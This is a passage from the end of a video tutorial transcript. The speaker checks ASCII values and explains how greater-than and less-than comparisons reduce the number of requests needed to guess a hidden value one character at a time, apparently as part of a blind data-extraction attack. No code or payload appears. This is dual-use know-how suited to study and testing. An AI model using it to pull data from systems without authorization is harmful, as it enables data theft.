7,376, because if we man ASCII table, man ASCII, we can pull up an ASCII table. And if we go down to 0, the ordinal numbers, I believe, are decimal. And go all the way down to 0, we can see that should be 48. So if we equals 48 here, we get 7,393, which is the correct thing. So if you want to speed this up, you could say, okay, well, if this number is, where is the last number, greater than 58. So if we do greater than 58, we know it's going to be a character. And if it's less than 58, we know it's going to be a number. And then we don't have to loop over the characters, because we know we just eliminated 9 things at once, essentially. So we put that here. If it's less, then we start the loop here. If it's more, we start the loop here. And you can also go even further and then say if it's less than whatever ORD 4 is, go back, more, then go forward. And do those less than or greater thans to take out a bunch of characters at once. And that will speed this up greatly. So instead of making like 15 requests, you'd make 2 requests to find it or something like that. And I think that's going to sum up the video. So yeah, hope you guys enjoyed this. Take care, and I'll see you next week.